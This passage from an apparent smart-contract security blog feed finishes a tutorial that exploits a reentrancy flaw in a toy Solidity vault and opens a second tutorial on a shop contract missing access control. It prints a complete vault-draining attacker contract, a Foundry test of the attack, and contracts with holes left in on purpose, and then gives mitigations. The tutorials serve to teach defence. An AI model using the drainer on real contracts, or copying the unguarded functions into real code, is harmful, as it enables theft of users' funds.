    guildMembers[msg.sender] = Member({balance: 0, isMember: true});
}

```

Guild members can contribute to the shared treasure by depositing Ether. The `deposit` function ensures that only members can deposit funds. It also validates that the deposit amount is greater than zero and then updates the member’s balance as well as the total vault balance. This function plays a critical role in maintaining the integrity of the shared vault.

```solidity
function deposit() external payable onlyMembers {
    require(msg.value &gt; 0, &quot;You must deposit some treasure!&quot;);

    guildMembers[msg.sender].balance += msg.value;
    totalVaultBalance += msg.value;
}

```

Withdrawing treasure is just as important as depositing it. The `withdraw` function allows members to retrieve their deposited Ether. The function checks that the withdrawal amount is valid and that the member has sufficient funds. The Ether is transferred to the member, and the balances are updated afterward.

```solidity
function withdraw(uint256 amount) external onlyMembers {
    Member storage member = guildMembers[msg.sender];
    require(amount &gt; 0, &quot;Withdrawal amount must be greater than zero!&quot;);
    require(
        member.balance &gt;= amount,
        &quot;Not enough balance in your treasure account!&quot;
    );

    (bool success, ) = msg.sender.call{value: amount}(&quot;&quot;);
    require(success, &quot;Failed to send Ether!&quot;);
    member.balance -= amount;
    totalVaultBalance -= amount;
}

```

Lastly, the contract can receive Ether directly through its `receive` function. This function is triggered whenever Ether is sent to the contract’s address without specifying any function. It ensures that the vault can accept funds even outside structured deposits.

```solidity
receive() external payable {
    totalVaultBalance += msg.value;
}

```

# **The Strategy Behind Exploiting the Vault**

To exploit the vulnerability in the **Pirate&apos;s Guild Vault**, we utilize a classic reentrancy attack. This attack manipulates the sequence of operations in the `withdraw` function, allowing us to withdraw funds repeatedly before the contract updates the user’s balance. By leveraging this flaw, an attacker can drain the vault of all its Ether. In this section, we’ll break down the strategy and introduce the malicious contract that executes the attack.

## **Understanding the Exploitation Plan**

The reentrancy attack hinges on a crucial misstep in the `withdraw` function of the vault. Specifically, the Ether transfer to the user occurs **before** the user’s balance is updated. This sequence allows an attacker to execute the following strategy:

1.  **Infiltration:** The attacker first registers as a legitimate guild member using the `joinGuild` function of the vault.
2.  **Setup:** The attacker deposits a small amount of Ether (e.g., 1 ETH) into the vault to ensure they have a balance to withdraw.
3.  **Trigger:** The attacker invokes the `withdraw` function to withdraw their deposited Ether. When the Ether is sent to the attacker, the vault&apos;s `receive` function is triggered.
4.  **Reentrancy:** Instead of simply receiving the Ether, the attacker uses the receive function to call `withdraw` again, re-entering the vault contract **before the balance is updated**. This process repeats in a loop, draining the vault in chunks.
5.  **Cleanup:** Once the vault is empty, the attacker stops the reentrancy loop and collects the stolen Ether.

## **The Malicious Contract: `TheTraitorWithin`**

To execute this attack, we deploy a specialized malicious contract named `TheTraitorWithin`. Below is a breakdown of its components and functionality.

&lt;details&gt;
&lt;summary&gt;Malicious Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;./PiratesGuildVault.sol&quot;;

contract TheTraitorWithin {
    PiratesGuildVault public targetVault;
    address public traitor;
    bool public heistInProgress;

    // Debugging events
    event BankDebug(string message, uint256 value, uint256 vaultBalance);
    event FallbackTriggered(
        string message,
        uint256 value,
        uint256 vaultBalance
    );

    constructor(address payable _vaultAddress) {
        targetVault = PiratesGuildVault(_vaultAddress);
        traitor = msg.sender;
    }

    // The traitor secretly joins the bank as a trusted member
    function infiltrate() external {
        require(
            msg.sender == traitor,
            &quot;Only the traitor can infiltrate the bank!&quot;
        );

        emit BankDebug(
            &quot;The traitor infiltrates the bank&quot;,
            0,
            address(targetVault).balance
        );

        targetVault.joinGuild(); // Traitor joins the guild as a legitimate member
    }

    // The traitor initiates the heist
    function executeHeist() external payable {
        require(
            msg.sender == traitor,
            &quot;Only the traitor can execute the heist!&quot;
        );
        require(
            msg.value &gt;= 1 ether,
            &quot;The heist requires at least 1 ETH to proceed!&quot;
        );

        // Log the start of the heist
        emit BankDebug(
            &quot;Heist begins: depositing funds into the vault&quot;,
            msg.value,
            address(targetVault).balance
        );

        // Deposit Ether into the vault
        targetVault.deposit{value: msg.value}();

        // Log after deposit
        emit BankDebug(
            &quot;Funds deposited, preparing for reentrancy attack&quot;,
            msg.value,
            address(targetVault).balance
        );

        // Start the reentrancy heist
        heistInProgress = true;

        // Withdraw the deposited amount to trigger reentrancy
        targetVault.withdraw(msg.value);

        // Ensure the heist concludes properly
        heistInProgress = false;
    }

    // The traitor collects their loot after the heist
    function claimLoot() external {
        require(
            msg.sender == traitor,
            &quot;Only the traitor can claim the stolen loot!&quot;
        );

        emit BankDebug(
            &quot;The traitor claims the stolen funds&quot;,
            address(this).balance,
            address(targetVault).balance
        );

        payable(traitor).transfer(address(this).balance);
    }

    // Receive Ether to continue the attack
    receive() external payable {
        emit FallbackTriggered(
            &quot;Receive triggered during heist&quot;,
            msg.value,
            address(targetVault).balance
        );

        if (heistInProgress &amp;&amp; address(targetVault).balance &gt; 0) {
            targetVault.withdraw(1 ether); // Continue withdrawing funds in small chunks
        }
    }
}

```
&lt;/details&gt;


The constructor of `TheTraitorWithin` initializes the attacker&apos;s identity and sets the target vault contract. The constructor ensures that the attacker is identified as the deployer of the contract and that it interacts with the specified vulnerable vault.

```solidity
constructor(address payable _vaultAddress) {
    targetVault = PiratesGuildVault(_vaultAddress);
    traitor = msg.sender;
}

```

The `infiltrate` function allows the attacker to join the vault as a legitimate member. By calling the `joinGuild` function on the `PiratesGuildVault`, the malicious contract gains member privileges, laying the groundwork for the attack. It also emits a debug event to log the infiltration.

```solidity
function infiltrate() external {
    require(
        msg.sender == traitor,
        &quot;Only the traitor can infiltrate the bank!&quot;
    );

    emit BankDebug(
        &quot;The traitor infiltrates the bank&quot;,
        0,
        address(targetVault).balance
    );

    targetVault.joinGuild(); // Traitor joins the guild as a legitimate member
}

```

The `executeHeist` function initiates the attack by first depositing Ether into the vault. This makes the contract appear as a legitimate participant. Once the deposit is made, it triggers a withdrawal to exploit the reentrancy vulnerability. The `heistInProgress` flag ensures that the `receive` function knows when to continue exploiting the vulnerability.

```solidity
function executeHeist() external payable {
    require(
        msg.sender == traitor,
        &quot;Only the traitor can execute the heist!&quot;
    );
    require(
        msg.value &gt;= 1 ether,
        &quot;The heist requires at least 1 ETH to proceed!&quot;
    );

    emit BankDebug(
        &quot;Heist begins: depositing funds into the vault&quot;,
        msg.value,
        address(targetVault).balance
    );

    targetVault.deposit{value: msg.value}();

    emit BankDebug(
        &quot;Funds deposited, preparing for reentrancy attack&quot;,
        msg.value,
        address(targetVault).balance
    );

    heistInProgress = true;

    targetVault.withdraw(msg.value);

    heistInProgress = false;
}

```

In this exploit, the `receive` function in the malicious contract is used strategically to intercept Ether transfers during a withdrawal process. It enables the attacker to repeatedly invoke the vulnerable contract&apos;s `withdraw` function each time the malicious contract receives Ether. By doing so, the attack loops continuously, draining the vault’s balance until it is fully exhausted.

Here’s the implementation of the `receive` function in the malicious contract, showcasing how it sustains the attack loop:

```solidity
receive() external payable {
    emit FallbackTriggered(
        &quot;Receive triggered during heist&quot;,
        msg.value,
        address(targetVault).balance
    );

    if (heistInProgress &amp;&amp; address(targetVault).balance &gt; 0) {
        targetVault.withdraw(1 ether); // Continue withdrawing funds in small chunks
    }
}

```

# Testing the Vulnerability in the Pirate&apos;s Guild Vault

In this section, we&apos;ll use Foundry to automate the process of testing the reentrancy vulnerability in the Pirate&apos;s Guild Vault contract. We will leverage Foundry&apos;s testing capabilities to not only execute the exploit but also verify that the vulnerability is successfully exploited.

&lt;details&gt;
&lt;summary&gt;Testing the Exploit&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Test.sol&quot;;
import &quot;../src/PiratesGuildVault.sol&quot;;
import &quot;../src/TheTraitorWithin.sol&quot;;

contract TraitorInBankTest is Test {
    PiratesGuildVault public vault;
    TheTraitorWithin public traitorContract;

    address public traitor = address(0x123);
    address public victim = address(0x456);

    function setUp() public {
        // Fund the traitor and the victim with Ether
        vm.deal(traitor, 10 ether);
        vm.deal(victim, 5 ether);

        // Deploy the vulnerable contract
        vault = new PiratesGuildVault();

        // Deploy the traitor contract from the traitor&apos;s address
        vm.prank(traitor);
        traitorContract = new TheTraitorWithin(payable(address(vault)));

        // The victim joins the vault and deposits funds
        vm.startPrank(victim);
        vault.joinGuild();
        vault.deposit{value: 5 ether}();
        vm.stopPrank();
    }

    function testTraitorHeist() public {
        // Verify that the vault has the expected balance before the attack
        assertEq(
            address(vault).balance,
            5 ether,
            &quot;Vault initial balance incorrect&quot;
        );

        // The traitor infiltrates the vault through their malicious contract
        vm.startPrank(traitor);
        traitorContract.infiltrate();

        // The traitor executes the heist
        traitorContract.executeHeist{value: 1 ether}();
        traitorContract.claimLoot();

        console.log(&quot;Final balance of the traitor:&quot;, traitor.balance);

        // Verify balances after the heist
        assertEq(address(vault).balance, 0 ether, &quot;Vault balance not drained&quot;);
        assertGt(
            address(traitor).balance,
            10 ether,
            &quot;Traitor did not gain expected funds&quot;
        );
        vm.stopPrank();
    }
}

```
&lt;/details&gt;


## Setting Up the Testing Environment

To start, we set up a testing environment where both the vulnerable contract (`PiratesGuildVault`) and the malicious contract (`TheTraitorWithin`) are deployed. The testing environment simulates a real-world scenario by assigning two roles: the **victim**, who deposits Ether into the vault, and the **traitor**, who uses a malicious contract to exploit the vault.

```solidity
function setUp() public {
    // Fund the traitor and the victim with Ether
    vm.deal(traitor, 10 ether);
    vm.deal(victim, 5 ether);

    // Deploy the vulnerable contract
    vault = new PiratesGuildVault();

    // Deploy the malicious contract from the traitor&apos;s address
    vm.prank(traitor);
    traitorContract = new TheTraitorWithin(payable(address(vault)));

    // The victim joins the vault and deposits funds
    vm.startPrank(victim);
    vault.joinGuild();
    vault.deposit{value: 5 ether}();
    vm.stopPrank();
}

```

This setup ensures the test accurately simulates a real-world deployment of the exploit. The victim deposits 5 Ether into the vault, and the traitor is equipped with the necessary resources to execute the attack. Success is confirmed when the attacker’s balance increases from 10 Ether to 15 Ether, demonstrating that the vault has been effectively drained.

## Executing the Attack

The next step is simulating the attack through the test function. The **traitor** begins by infiltrating the guild to join as a legitimate member, which is a prerequisite for interacting with the vault.

```solidity
traitorContract.infiltrate();

```

After successfully joining, the traitor executes the heist by depositing 1 Ether into the vault and immediately triggering a reentrancy attack to drain its funds.

```solidity
traitorContract.executeHeist{value: 1 ether}();

```

Once the attack is complete, the traitor claims the stolen funds from their malicious contract:

```solidity
traitorContract.claimLoot();

```

## Validating the Results

Finally, the test validates whether the exploit succeeded by comparing the vault&apos;s balance and the traitor&apos;s final balance against expected values.

```solidity
// Verify balances after the heist
assertEq(address(vault).balance, 0 ether, &quot;Vault balance not drained&quot;);
assertGt(
    address(traitor).balance,
    10 ether,
    &quot;Traitor did not gain expected funds&quot;
);

```

These assertions ensure the vault was fully drained and the traitor successfully gained funds.

# Understanding the Test Failure with Forge

When we execute the test using **Forge**, we encounter a failure during the reentrancy attack simulation. The output reveals an exception with the error message: **&quot;Failed to send Ether!&quot;**. This issue arises due to the behavior of the reentrancy attack after draining all the Ether from the vault. Let’s break it down.

```bash
forge test -v
forge test -vvv

```

![](/content/images/2024/11/image-21.png)

Error running the exploit

![](/content/images/2024/11/image-23.png)

Logs of the exploit

#### Why the Exception Occurs

During the reentrancy attack, the malicious contract continuously calls the `withdraw` function of the vulnerable contract (`PiratesGuildVault`). Each recursive call successfully drains Ether from the vault until its balance reaches zero. However, the issue lies in how the `withdraw` function is implemented.

Once the vault is fully drained, the attack doesn’t immediately stop because of the repeated invocation of the `receive` function during the exploit. The key issue lies in how the execution flows back to the vulnerable contract. After each iteration of the `receive` function, control returns to the original `withdraw` function, which continues executing as if the vault still has funds. This leads to attempts to deduct Ether from an already empty balance, eventually triggering an exception.

```solidity
(bool success, ) = msg.sender.call{value: amount}(&quot;&quot;);
require(success, &quot;Failed to send Ether!&quot;);

```

Here, the contract attempts to transfer Ether even though the vault’s balance is zero. As a result:

1.  **Arithmetic Overflow or Underflow**: When the function tries to subtract the `amount` from `member.balance` and `totalVaultBalance`, it encounters a state where the subtraction would result in a negative number. Solidity’s arithmetic operations revert in such cases, throwing an exception.
2.  **Failed Ether Transfer**: Since the vault no longer holds any Ether, the transfer operation (`call`) fails, causing the function to revert with the message: **&quot;Failed to send Ether!&quot;**.

#### Observing the Failure in the Test

The Forge test output highlights this issue. After draining all the Ether, the recursive attack proceeds, and the vulnerable function fails when it attempts to subtract balances or transfer Ether. This behavior is seen in the trace:

1.  Ether is drained recursively until the balance reaches zero.
2.  Further recursive calls result in a **revert** due to arithmetic errors or failed transfers.

#### Addressing the Issue in the Vulnerable Contract

To ensure the test does not fail in this manner, we can modify the `withdraw` function of the vulnerable contract to handle edge cases where the balance is insufficient for transfer. The following conditional logic can be added to prevent execution when the balances are already depleted:

```solidity
(bool success, ) = msg.sender.call{value: amount}(&quot;&quot;);
require(success, &quot;Failed to send Ether!&quot;);
if (member.balance &gt; 0 &amp;&amp; totalVaultBalance &gt; 0) {
    member.balance -= amount;
    totalVaultBalance -= amount;
}

```

Here’s how this logic works:

-   The subtraction of `member.balance` and `totalVaultBalance` is only executed if their values are greater than zero.
-   This ensures that the contract does not attempt to deduct negative balances, thus preventing arithmetic overflow or underflow.

If we now run the test after making the changes, we’ll observe that the attacker successfully drains the vault&apos;s Ether, ending up with significantly more Ether than they initially deposited—despite only contributing 1 ETH to the vault at the start.

![](/content/images/2024/11/image-24.png)

Running the exploit after fixing the code

I wanted to highlight this error because it’s a crucial detail in understanding how Ethereum&apos;s transaction system works and why testing on real networks behaves differently compared to a controlled environment.

In a real network, if an exception is triggered during a transaction—such as attempting to deduct Ether from an empty balance—the **entire transaction will be reverted**. This means the attacker **won’t be able to keep the Ether they were trying to withdraw in that specific transaction**.

Ethereum transactions operate atomically, meaning that if any part of the transaction fails (like throwing an exception), the network will completely revert the state to what it was before the transaction started. This includes undoing any Ether transfers made during that transaction.

However, if the attack has already drained Ether in previous iterations before the exception occurs, those successful transfers **will remain with the attacker**. Each call to the `withdraw` function that succeeded is treated as its own independent transaction and cannot be undone retroactively. The exception only affects the transaction where the error occurs, leaving the previously stolen funds untouched.

# Mitigating the Reentrancy Vulnerability

Now that we’ve explored how the reentrancy vulnerability works and tested it in action, it’s time to focus on fixing the flaw to ensure the smart contract operates securely. Reentrancy attacks exploit the sequence of operations, so our primary goal is to re-architect the vulnerable function to prevent recursive calls.

#### Applying the Checks-Effects-Interactions Pattern

The **Checks-Effects-Interactions** pattern is a well-known best practice in smart contract development. It involves:

1.  **Checks**: Validate input conditions and enforce rules at the beginning of the function.
2.  **Effects**: Update the contract&apos;s state variables to reflect the intended changes.
3.  **Interactions**: Transfer Ether or interact with external contracts only after state variables are updated.

In the context of the `PiratesGuildVault` contract, the vulnerability arises from transferring Ether to the caller (`msg.sender`) **before** updating the user’s balance and the vault&apos;s total balance. To fix this, we must ensure that the balances are updated before transferring Ether.

Here’s the updated `withdraw` function implementing the fix:

```solidity
function withdraw(uint256 amount) external onlyMembers {
    Member storage member = guildMembers[msg.sender];
    require(amount &gt; 0, &quot;Withdrawal amount must be greater than zero!&quot;);
    require(
        member.balance &gt;= amount,
        &quot;Not enough balance in your treasure account!&quot;
    );

    // Update balances before transferring Ether
    member.balance -= amount;
    totalVaultBalance -= amount;

    // Transfer Ether after state update
    (bool success, ) = msg.sender.call{value: amount}(&quot;&quot;);
    require(success, &quot;Failed to send Ether!&quot;);
}

```

#### Why This Fix Works

1.  **State Updates First**: By reducing the balance **before** transferring Ether, any reentrant calls made by the attacker will fail the `require` checks, as the balance will no longer meet the required conditions.
2.  **Safe External Interaction**: The Ether transfer occurs only after the contract&apos;s state is fully updated, effectively breaking the loop that enables reentrancy.

#### Additional Best Practices

While the `Checks-Effects-Interactions` pattern significantly reduces the risk of reentrancy, developers should also consider:

-   **Using `ReentrancyGuard`**: OpenZeppelin&apos;s `ReentrancyGuard` is a utility that prevents reentrant calls by locking the function during execution.
-   **Avoiding `call` for Ether Transfers**: Use `transfer` or `send`, which provide a fixed gas stipend, though `call` might still be needed in some scenarios for greater compatibility.
-   **Auditing and Testing**: Ensure thorough testing, such as the automated tests we demonstrated earlier, to verify that the vulnerability is eliminated.

# Conclusions

Reentrancy attacks highlight the critical need for secure coding practices in smart contract development. This chapter demonstrated how reentrancy exploits occur, how to test for them with Foundry, and why automation is essential for robust defenses.

#### Key Takeaways

-   **Vulnerability Root Cause**: Reentrancy attacks exploit sending Ether before updating state variables, allowing recursive calls to drain funds.
-   **Testing in Action**: Simulating the attack with Foundry uncovered the vulnerability and emphasized the importance of automated testing for real-world scenarios.
-   **Preventive Measures**: Adopting the **checks-effects-interactions** pattern and updating state variables before transfers mitigates this risk.

By understanding and addressing vulnerabilities like reentrancy, developers can create more secure, resilient smart contracts, fostering trust and reliability in decentralized systems.

# Resources

-   **Foundry** - A Blazing Fast, Modular, and Portable Ethereum Development Framework. &quot;Foundry Documentation.&quot; Available at: https://book.getfoundry.sh/
-   **Solidity** - Language for Smart Contract Development. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/](https://docs.soliditylang.org/)
-   **Reentrancy Attacks** - Understanding and Preventing Reentrancy. &quot;Solidity Documentation: Security Considerations.&quot; Available at: [https://docs.soliditylang.org/en/v0.8.0/security-considerations.html#re-entrancy](https://docs.soliditylang.org/en/v0.8.0/security-considerations.html#re-entrancy)
-   **OpenZeppelin** - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)
-   **Ethereum** - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   **Testing Ethereum Smart Contracts** - Best Practices with Foundry. &quot;Foundry Documentation.&quot; Available at: https://book.getfoundry.sh/tutorials/testing</content:encoded><author>Ruben Santos</author></item><item><title>Refunds Gone Wrong: How Access Control Flaws Can Drain Your Contract</title><link>https://www.kayssel.com/post/web3-3</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-3</guid><description>This article explores a smart contract access control vulnerability using the Magic Item Shop example. By demonstrating an exploit due to missing ownership checks, we highlight the importance of verifying caller authorization, rigorous testing, and secure coding practices to protect contracts.</description><pubDate>Sun, 17 Nov 2024 14:18:29 GMT</pubDate><content:encoded># Access Control Vulnerabilities in Smart Contracts

In smart contract security, enforcing strict access control is critical to protect contracts from unauthorized actions that could lead to abuse. Access control vulnerabilities—where an attacker gains access to functions meant for specific users—are common in blockchain and can lead to significant losses or unwanted behavior, especially in contracts handling assets or funds.

In this chapter, we’ll walk through an access control vulnerability in a fictional Magic Item Shop smart contract, designed to allow users to buy, gift, and return magical items. However, there’s an exploitable flaw within the refund process, showcasing how insufficient access control can be a security risk, even in seemingly straightforward functions.

Here’s our plan of action:

1.  **Contract Overview**: We’ll start by reviewing the Magic Item Shop contract to understand its intended behavior and user roles.
2.  **Deploying the Contract**: I’ll provide a script to deploy this contract locally, allowing you to interact with it directly.
3.  **Examining the Code**: We’ll observe how functions manage ownership and access, simulating typical user actions.
4.  **Exploit Walkthrough**: We’ll exploit the access control flaw, triggering unauthorized refunds to highlight the risk.
5.  **Security Takeaways**: Finally, we’ll cover key security principles for managing access control in smart contracts to avoid similar vulnerabilities.

By the end of this chapter, you’ll understand how access control oversights can lead to serious vulnerabilities in smart contracts and learn strategies for protecting them. Let’s get started!

# Explanation of the Smart Contract: **Magic Item Shop**

The **Magic Item Shop** is a smart contract that sets up a simple marketplace where users can buy, gift, and even return magical items with different levels of rarity and prices. Each item has a unique ID, a rarity level (like &quot;common&quot; or &quot;legendary&quot;), a set price in Ether, and an owner. This contract is set up to let users trade and manage these items, while also allowing the shop owner to add new ones. Let’s walk through how it works.

&lt;details&gt;
&lt;summary&gt;Magic Item Shop contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract MagicItemShop {
    address public owner;
    address public shopAddress;
    uint256 public itemCount;

    struct Item {
        uint256 id;
        string name;
        string rarity;
        uint256 price;
        address currentOwner;
    }

    mapping(uint256 =&gt; Item) public items;

    event ItemAdded(uint256 itemId, string name, string rarity, uint256 price);
    event ItemPurchased(uint256 itemId, address indexed buyer, uint256 price);
    event ItemReturned(
        uint256 itemId,
        address indexed returner,
        uint256 refund
    );
    event OwnershipTransferred(uint256 itemId, address indexed newOwner);

    constructor() {
        owner = msg.sender;
        shopAddress = address(this);
    }

    // Modifier to restrict certain actions to the contract owner
    modifier onlyOwner() {
        require(msg.sender == owner, &quot;Caller is not the owner&quot;);
        _;
    }

    // Add a new item to the shop (only the owner can add items)
    function addItem(
        string memory name,
        string memory rarity,
        uint256 price
    ) public onlyOwner {
        items[itemCount] = Item(itemCount, name, rarity, price, shopAddress);
        emit ItemAdded(itemCount, name, rarity, price);
        itemCount++;
    }

    // Purchase an item by paying the specified price
    function purchaseItem(uint256 itemId) public payable {
        require(itemId &lt; itemCount, &quot;Item does not exist&quot;);
        Item storage item = items[itemId];
        require(item.currentOwner == shopAddress, &quot;Item already sold&quot;);
        require(msg.value &gt;= item.price, &quot;Insufficient funds to purchase item&quot;);

        item.currentOwner = msg.sender;
        emit ItemPurchased(itemId, msg.sender, msg.value);
    }

    // Function that lets users &quot;return&quot; an item to the shop
    function returnItemToShop(uint256 itemId) public {
        Item storage item = items[itemId];

        // Refund is set to half of the original price
        uint256 refundAmount = item.price / 2;

        item.currentOwner = shopAddress;
        payable(msg.sender).transfer(refundAmount);

        emit ItemReturned(itemId, msg.sender, refundAmount);
    }

    // Function to &quot;gift&quot; an item to another user (accessible by the item owner only)
    function giftItem(uint256 itemId, address newOwner) public {
        require(newOwner != address(0), &quot;New owner cannot be zero address&quot;);
        require(
            msg.sender == items[itemId].currentOwner,
            &quot;Only item owner can gift&quot;
        );

        items[itemId].currentOwner = newOwner;
        emit OwnershipTransferred(itemId, newOwner);
    }

    // Get the list of items currently available for sale
    function getItemsForSale() public view returns (Item[] memory) {
        // Count how many items are still for sale
        uint256 unsoldItemCount = 0;
        for (uint256 i = 0; i &lt; itemCount; i++) {
            if (items[i].currentOwner == shopAddress) {
                unsoldItemCount++;
            }
        }

        // Create an array to store unsold items
        Item[] memory unsoldItems = new Item[](unsoldItemCount);
        uint256 index = 0;

        // Populate the array with items that are still for sale
        for (uint256 i = 0; i &lt; itemCount; i++) {
            if (items[i].currentOwner == shopAddress) {
                unsoldItems[index] = items[i];
                index++;
            }
        }

        return unsoldItems;
    }
}

```
&lt;/details&gt;


First up is the `addItem` function. This function is what the shop owner uses to add new items to the store. When the owner calls `addItem`, they specify the item’s name, rarity, and price, and the item gets added to a list with a unique ID. Only the owner of the contract can add items, which is important for keeping control over what’s in the shop. Here’s the code for `addItem`:

```solidity
function addItem(string memory name, string memory rarity, uint256 price) public onlyOwner {
    items[itemCount] = Item(itemCount, name, rarity, price, shopAddress);
    itemCount++;
}

```

Next, we have `purchaseItem`, the function that lets users buy an item from the shop. When someone calls `purchaseItem`, they send the required amount of Ether for the item they want. The contract checks that the item exists, that it hasn’t already been sold, and that the buyer has sent enough Ether to cover the price. If all these checks pass, the function transfers ownership of the item from the shop to the buyer’s address, making them the new owner. Here’s the code for `purchaseItem`:

```solidity
function purchaseItem(uint256 itemId) public payable {
    require(itemId &lt; itemCount, &quot;Item does not exist&quot;);
    Item storage item = items[itemId];
    require(item.currentOwner == shopAddress, &quot;Item already sold&quot;);
    require(msg.value &gt;= item.price, &quot;Insufficient funds to purchase item&quot;);

    item.currentOwner = msg.sender;
}

```

The contract also includes a `giftItem` function, which allows users who already own an item to give it to someone else. This could be useful for gifting items to friends or trading within the marketplace. Before transferring the item, the function checks to make sure the caller is actually the current owner. Once confirmed, it then assigns the new owner’s address to the item. This function is straightforward but essential for enabling transfers between users. Here’s how `giftItem` is set up:

```solidity
function giftItem(uint256 itemId, address newOwner) public {
    require(newOwner != address(0), &quot;New owner cannot be zero address&quot;);
    require(msg.sender == items[itemId].currentOwner, &quot;Only item owner can gift&quot;);

    items[itemId].currentOwner = newOwner;
}

```

Finally, we come to `returnItemToShop`, which allows users to “sell back” items they no longer want. The idea here is simple: users can return an item to the shop and receive a partial refund (half of the item’s price). The function transfers the Ether back to the user and marks the item’s owner as the shop again, as if the item were back on the shelf.

```solidity
function returnItemToShop(uint256 itemId) public {
    Item storage item = items[itemId];

    // Refund is set to half of the original price
    uint256 refundAmount = item.price / 2;

    // No access control: anyone can call this function and change the owner
    item.currentOwner = shopAddress;
    payable(msg.sender).transfer(refundAmount);
}

```

# Script for Deploying the Magic Item Shop Contract

Here, we’re going to walk through the script that deploys our **Magic Item Shop** contract and sets it up with a few magical items for users to buy. This deployment script is written in JavaScript using Hardhat, a tool that makes working with Ethereum smart contracts easier. Not only does this script handle deploying the contract, but it also adds some initial items to the shop with specific names, rarities, and prices, so our contract is ready to go right after deployment.

&lt;details&gt;
&lt;summary&gt;Deployment Script&lt;/summary&gt;

```js
// Import Hardhat Runtime Environment and ethers
const hre = require(&quot;hardhat&quot;);

async function main() {
  // Get the contract factory and deploy the MagicItemShop contract
  const MagicItemShop = await hre.ethers.getContractFactory(&quot;MagicItemShop&quot;);
  const shop = await MagicItemShop.deploy();
  await shop.waitForDeployment();

  console.log(&quot;MagicItemShop deployed to:&quot;, shop.target);

  // Define items to add to the shop
  const items = [
    {
      name: &quot;Sword of Flames&quot;,
      rarity: &quot;Rare&quot;,
      price: hre.ethers.parseEther(&quot;1&quot;),
    },
    {
      name: &quot;Shield of Light&quot;,
      rarity: &quot;Uncommon&quot;,
      price: hre.ethers.parseEther(&quot;0.5&quot;),
    },
    {
      name: &quot;Staff of Wisdom&quot;,
      rarity: &quot;Epic&quot;,
      price: hre.ethers.parseEther(&quot;2&quot;),
    },
    {
      name: &quot;Potion of Healing&quot;,
      rarity: &quot;Common&quot;,
      price: hre.ethers.parseEther(&quot;0.1&quot;),
    },
    {
      name: &quot;Ring of Invisibility&quot;,
      rarity: &quot;Legendary&quot;,
      price: hre.ethers.parseEther(&quot;5&quot;),
    },
  ];

  // Loop through each item and add it to the shop
  for (const item of items) {
    const tx = await shop.addItem(item.name, item.rarity, item.price);
    await tx.wait();
    console.log(
      `Added item: ${item.name} - Rarity: ${
        item.rarity
      } - Price: ${hre.ethers.formatEther(item.price)} ETH`
    );
  }

  console.log(&quot;Shop initialized with items!&quot;);
}

// Run the deployment and initialization script
main().catch((error) =&gt; {
  console.error(error);
  process.exitCode = 1;
});


```
&lt;/details&gt;


Let’s break down how it works.

The script starts by importing Hardhat’s runtime environment (`hre`) and the `ethers` library. Hardhat helps manage the whole process of deploying and testing contracts, while `ethers` gives us tools for interacting with the Ethereum blockchain. Here’s what that setup looks like:

```js
// Import Hardhat Runtime Environment and ethers
const hre = require(&quot;hardhat&quot;);

```

Next, we define an asynchronous function called `main()` that handles the deployment and setup steps. Inside `main()`, we first get the contract factory for `MagicItemShop`, which is like a blueprint that lets us deploy a new instance of the contract. To actually deploy it, we call `MagicItemShop.deploy()`, which sends the contract code to the blockchain. We then wait for the deployment to complete with `shop.waitForDeployment()`, and once it’s done, we log the contract’s address to confirm everything went smoothly.

```js
async function main() {
  // Get the contract factory and deploy the MagicItemShop contract
  const MagicItemShop = await hre.ethers.getContractFactory(&quot;MagicItemShop&quot;);
  const shop = await MagicItemShop.deploy();
  await shop.waitForDeployment();

  console.log(&quot;MagicItemShop deployed to:&quot;, shop.target);

```

With the contract deployed, the next part of the script defines a set of magical items to add to the shop. We create an array called `items`, where each entry is an item with a `name`, `rarity`, and `price`. The prices are set in Ether, and we use `hre.ethers.parseEther` to convert these amounts to Wei (the smallest unit of Ether) so they’re ready for the blockchain. This initial inventory makes sure the shop has items ready for users as soon as the contract is live.

```js
  // Define items to add to the shop
  const items = [
    {
      name: &quot;Sword of Flames&quot;,
      rarity: &quot;Rare&quot;,
      price: hre.ethers.parseEther(&quot;1&quot;),
    },
    {
      name: &quot;Shield of Light&quot;,
      rarity: &quot;Uncommon&quot;,
      price: hre.ethers.parseEther(&quot;0.5&quot;),
    },
    {
      name: &quot;Staff of Wisdom&quot;,
      rarity: &quot;Epic&quot;,
      price: hre.ethers.parseEther(&quot;2&quot;),
    },
    {
      name: &quot;Potion of Healing&quot;,
      rarity: &quot;Common&quot;,
      price: hre.ethers.parseEther(&quot;0.1&quot;),
    },
    {
      name: &quot;Ring of Invisibility&quot;,
      rarity: &quot;Legendary&quot;,
      price: hre.ethers.parseEther(&quot;5&quot;),
    },
  ];

```

After defining the items, the script loops through each item in the array and calls the `addItem` function on the contract to add it to the shop. We use `await` here to ensure each item is added one at a time, and `tx.wait()` to wait for each transaction to complete before moving to the next item. As each item is added, the script logs its name, rarity, and price in Ether so we can keep track of what’s been initialized.

```js
  // Loop through each item and add it to the shop
  for (const item of items) {
    const tx = await shop.addItem(item.name, item.rarity, item.price);
    await tx.wait();
    console.log(
      `Added item: ${item.name} - Rarity: ${
        item.rarity
      } - Price: ${hre.ethers.formatEther(item.price)} ETH`
    );
  }

  console.log(&quot;Shop initialized with items!&quot;);
}

```

Finally, we include a `main().catch(...)` line to handle any errors that might pop up during deployment. If something goes wrong, this line will catch the error, print it to the console, and set the exit code to `1` (indicating a failure), which can be helpful for debugging.

```js
// Run the deployment and initialization script
main().catch((error) =&gt; {
  console.error(error);
  process.exitCode = 1;
});

```

![](/content/images/2024/11/image-6.png)

Running the deployment script

# Introduction to the Attack

Now that we’ve deployed our Magic Item Shop contract and stocked it with a selection of magical items, we’re ready to examine a potential vulnerability lurking within. The shop is designed to offer users flexibility—allowing them to buy, gift, and even return items for a partial refund. But while these features provide a smooth user experience, there’s a hidden issue in the `returnItemToShop` function that could be a problem if it falls into the wrong hands.

